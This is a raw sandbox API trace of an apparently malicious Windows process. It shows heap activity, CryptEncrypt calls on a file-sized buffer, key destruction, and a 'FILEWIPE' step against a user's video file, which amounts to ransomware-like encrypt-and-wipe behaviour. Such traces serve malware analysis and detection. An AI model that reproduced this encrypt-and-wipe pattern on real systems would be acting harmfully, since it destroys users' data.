lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0192.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0192.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0192.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0192.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0192.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0192.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0192.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0192.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0192.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0192.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0192.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0192.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0192.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0192.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0192.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0192.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0192.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0192.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0192.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0192.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0192.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0192.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0192.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0192.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0192.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0192.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0192.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0192.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0192.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0192.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0192.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0192.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0192.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0192.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0192.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0192.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0192.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0192.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0192.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0192.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0192.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0192.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0192.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0192.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0192.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0192.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0192.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0192.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0192.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0192.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0192.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0192.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0192.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0192.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0192.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0192.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0192.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0192.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0192.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0192.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0192.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0192.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0192.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0192.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0192.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0192.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0192.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0192.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0192.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0192.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0192.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0192.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0192.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0192.136] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0192.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0192.136] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c27f8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27f8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0192.137] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.137] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.137] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.137] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.137] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.137] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0192.137] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.137] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.137] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0192.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0192.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0192.137] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.137] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0192.137] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0192.137] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0192.137] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.137] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0192.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0192.138] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.138] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0192.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0192.138] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.138] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.138] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.138] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0192.138] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.138] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0192.138] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.139] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.140] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xaee7, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xaef0) returned 1 [0192.140] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.140] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0192.140] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.140] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.140] CharLowerBuffW (in: lpsz="byte[44785]", cchLength=0xb | out: lpsz="byte[44785]") returned 0xb [0192.140] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.142] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.142] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0192.143] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.143] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.143] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa5f008*, pdwDataLen=0x87e820*=0xaee7, dwBufLen=0xaef0 | out: pbData=0xa5f008*, pdwDataLen=0x87e820*=0xaef0) returned 1 [0192.146] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0192.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0192.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.147] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0192.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.169] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0192.178] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0192.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0192.178] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.178] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.178] CryptDestroyKey (hKey=0x90af98) returned 1 [0192.178] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0192.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0192.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.178] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0192.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.179] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.179] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0192.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0192.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0192.179] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0192.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0192.179] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0192.179] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0192.179] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0192.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0192.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0192.179] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.180] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0192.180] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0192.180] FreeLibrary (hLibModule=0x74f20000) returned 1 [0192.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0192.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0192.181] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0192.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0192.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.182] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e4feb80, ftCreationTime.dwHighDateTime=0x1d5daaa, ftLastAccessTime.dwLowDateTime=0xfe4da90, ftLastAccessTime.dwHighDateTime=0x1d5d7b0, ftLastWriteTime.dwLowDateTime=0xfe4da90, ftLastWriteTime.dwHighDateTime=0x1d5d7b0, nFileSizeHigh=0x0, nFileSizeLow=0xaee7, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="aXsAYPuZRSCYMOeip6.mkv", cAlternateFileName="AXSAYP~1.MKV")) returned 0x90af58 [0192.182] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0192.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0192.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0192.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0192.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0192.182] CharLowerBuffW (in: lpsz="byte[44775]", cchLength=0xb | out: lpsz="byte[44775]") returned 0xb [0192.182] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0192.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0192.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.183] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0192.183] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0192.183] FreeLibrary (hLibModule=0x75c90000) returned 1 [0192.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0192.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0192.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0192.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0192.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0192.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0192.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0192.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0192.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 